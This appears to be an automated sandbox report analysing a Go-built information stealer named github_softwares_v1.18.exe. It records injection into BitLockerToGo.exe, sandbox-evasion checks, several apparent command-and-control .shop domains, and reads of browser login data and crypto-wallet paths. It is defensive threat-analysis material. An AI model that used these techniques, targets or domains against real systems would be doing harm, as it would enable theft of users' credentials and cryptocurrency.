              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.init.func1
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.Bytes
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.init.func2
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.init.0
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.Protocol
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.Payload
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.String
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.Empty
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.Unmarshal
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.Marshal
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalJSON
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalJSON
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).Scan
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.NewIDAddress
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.NewActorAddress
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.addressHash
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.NewFromBytes
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.newAddress
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.encode
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.Checksum
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.base32decode
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.decode
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.ValidateChecksum
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.hash
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalBinary
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalBinary
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalCBOR
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalCBOR
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.init.1
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).Bytes
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).Empty
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).Marshal
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalBinary
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalJSON
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).Payload
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).Protocol
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).String
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.(*Address).Unmarshal
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.NewFromString
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/hashicorp/hc-install/internal/build.init
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/hashicorp/hc-install/product.init
              Source: github_softwares_v1.18.exeString found in binary or memory: 1type:.eq.[3]github.com/valkey-io/valkey-go/internal/cmds.Completedtype:.eq.[4]github.com/valkey-io/valkey-go/internal/cmds.Completedtype:.eq.[5]github.com/valkey-io/valkey-go/internal/cmds.Completedgithub.com/airforce270/airbot/permission.initgolang.org/x/exp/rand.initgolang.org/x/exp/rand.NewSourcegolang.org/x/exp/rand.(*PCGSource).Seedgolang.org/x/exp/rand.Newgolang.org/x/exp/rand.readgolang.org/x/exp/rand.(*PCGSource).Uint64golang.org/x/exp/rand.(*PCGSource).multiplygolang.org/x/exp/rand.(*PCGSource).addgolang.org/x/exp/rand.(*LockedSource).Uint64golang.org/x/exp/rand.(*LockedSource).Seedgolang.org/x/exp/rand.(*LockedSource).Readgolang.org/x/exp/rand.(*PCGSource).MarshalBinarygolang.org/x/exp/rand.(*PCGSource).UnmarshalBinarytype:.eq.golang.org/x/exp/rand.Randgithub.com/onsi/gomega/format.initgithub.com/petergtz/pegomock/v4.initgithub.com/hashicorp/go-version.init.0github.com/hashicorp/go-version.prereleaseCheckgithub.com/hashicorp/go-version.(*Version).Prereleasegithub.com/hashicorp/go-version.(*Version).equalSegmentsgithub.com/hashicorp/go-version.(*Version).Segments64github.com/hashicorp/go-version.constraintEqualgithub.com/hashicorp/go-version.(*Version).Equalgithub.com/hashicorp/go-version.constraintNotEqualgithub.com/hashicorp/go-version.constraintGreaterThangithub.com/hashicorp/go-version.constraintLessThangithub.com/hashicorp/go-version.constraintGreaterThanEqualgithub.com/hashicorp/go-version.constraintLessThanEqualgithub.com/hashicorp/go-version.constraintPessimisticgithub.com/hashicorp/go-version.(*Version).LessThangithub.com/hashicorp/go-version.init.1github.com/hashicorp/go-version.newVersiongithub.com/hashicorp/go-version.(*Version).Comparegithub.com/hashicorp/go-version.allZerogithub.com/hashicorp/go-version.comparePartgithub.com/hashicorp/go-version.comparePrereleasesgithub.com/hashicorp/go-version.(*Version).Stringgolang.org/x/mod/internal/lazyregexp.initgolang.org/x/mod/internal/lazyregexp.Newgolang.org/x/mod/internal/lazyregexp.(*Regexp).regolang.org/x/mod/internal/lazyregexp.(*Regexp).build-fmgolang.org/x/mod/internal/lazyregexp.(*Regexp).buildtype:.eq.golang.org/x/mod/internal/lazyregexp.Regexpgolang.org/x/mod/module.initgolang.org/x/mod/modfile.initgithub.com/hashicorp/hc-install/internal/build.initgithub.com/hashicorp/go-version.NewVersiongithub.com/hashicorp/go-version.Mustgithub.com/hashicorp/hc-install/product.initdebug/dwarf.initmain.initmain.DTmrIgCrphmain.Md5Encodemain.ytKayiJWPamain.VAWaNIGxhkmain.Memcpymain.Memsetmain.EUmYbmcUAGmain.ocwRCsCPHRio/ioutil.ReadFilemain.randSeqmain.pPUVgZVyOEmain.init.0main.mainmain.TerminateProcessmain.IsBadReadPtrmain.VirtualAllocmain.VirtualAllocExmain.cakJEcUUFAmain.ydalavksVTmain.CrgIsaShqomain.Is64Bitmain.emxWBxUpUdmain.JTHjHPuFMmmain.(*ApplyRelocCallback).processRelocFieldmain.FaFbjTwpAYmain.LEwTRJnGzVmain.(*BASE_RELOCATION_ENTRY).GetOffsetmain.(*BASE_RELOCATION_ENTRY).GetTypemain.ijGZAeCxnhmain.aRhdRNnUlAmain.BVhioCgrSVmain.bSVtHWyZxSmain.IeOSmicYkbmain.xSJjUNcndjmain.Virtual
              Source: github_softwares_v1.18.exeString found in binary or memory: net/addrselect.go
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/address.go
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/address.go
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/constants.go
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/magiconair/properties@v1.8.7/load.go
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/hashicorp/hc-install@v0.7.1-0.20240607080111-03e0bd63529f/internal/build/go_build.go
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/hashicorp/hc-install@v0.7.1-0.20240607080111-03e0bd63529f/internal/build/install_go_version.go
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/hashicorp/hc-install@v0.7.1-0.20240607080111-03e0bd63529f/internal/build/install_go_version.go
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/hashicorp/hc-install@v0.7.1-0.20240607080111-03e0bd63529f/product/terraform.go
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/hashicorp/hc-install@v0.7.1-0.20240607080111-03e0bd63529f/product/consul.go
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/hashicorp/hc-install@v0.7.1-0.20240607080111-03e0bd63529f/product/nomad.go
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/hashicorp/hc-install@v0.7.1-0.20240607080111-03e0bd63529f/product/vault.go
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeFile read: C:\Users\user\Desktop\github_softwares_v1.18.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\github_softwares_v1.18.exe "C:\Users\user\Desktop\github_softwares_v1.18.exe"
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: github_softwares_v1.18.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: github_softwares_v1.18.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: github_softwares_v1.18.exeStatic file information: File size 30190080 > 1048576
              Source: github_softwares_v1.18.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xdee600
              Source: github_softwares_v1.18.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xd33e00
              Source: github_softwares_v1.18.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000580000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708247125.000000C000400000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701551736.0000014A798F0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701601425.0000014A798B0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C0006A1000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000580000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708247125.000000C000400000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701551736.0000014A798F0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701601425.0000014A798B0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C0006A1000.00000004.00001000.00020000.00000000.sdmp
              Source: github_softwares_v1.18.exeStatic PE information: section name: .xdata
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A43710 push ecx; ret 1_2_02A43711
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A43718 push ecx; ret 1_2_02A43719
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7148Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7132Thread sleep time: -30000s >= -30000sJump to behavior
              Source: BitLockerToGo.exe, 00000001.00000003.1794021894.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E5B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1777480522.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1844557480.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1730573797.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1730674997.0000000002E8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: github_softwares_v1.18.exe, 00000000.00000002.1708816779.0000014A54234000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A39870 LdrInitializeThunk,1_2_02A39870

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A00000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A00000 value starts with: 4D5AJump to behavior
              Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: bravedreacisopm.shop
              Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: shellfyyousdjz.shop
              Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: broccoltisop.shop
              Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: grassytaisol.shop
              Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stimultaionsppzv.shop
              Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: parntorpkxzlp.shop
              Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: effectivedoxzj.shop
              Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: horizonvxjis.shop
              Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: weaknessmznxo.shop
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A00000Jump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 29F6008Jump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeQueries volume information: C:\Users\user\Desktop\github_softwares_v1.18.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: github_softwares_v1.18.exe, type: SAMPLE
              Source: Yara matchFile source: 00000000.00000000.1663970758.00007FF764F18000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1711084287.00007FF764F18000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: github_softwares_v1.18.exe PID: 6632, type: MEMORYSTR
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7056, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: BitLockerToGo.exe, 00000001.00000003.1754529360.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertynyb9B|
              Source: BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: BitLockerToGo.exe, 00000001.00000003.1777769387.0000000002E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
              Source: BitLockerToGo.exe, 00000001.00000003.1794021894.0000000002E89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: BitLockerToGo.exe, 00000001.00000003.1777769387.0000000002E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
